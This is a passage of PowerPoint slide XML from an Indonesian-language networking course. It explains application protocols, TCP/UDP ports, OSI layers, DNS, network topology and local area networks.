              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh port TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> UDP. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsionalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 4 model OSI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsionalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjelajahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web, email, dan transfer file. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 7 model OSI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server Domain Name System (DNS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resolusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalamatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama domain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>syarat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (FQDN), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP. DNS juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model OSI, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjelajahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Model OSI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>praktis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> 5, 6, dan 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bayangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> 7.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38957108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Pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengalihan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meneruskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, node dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> diagram yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> link.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (LAN). Kami </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
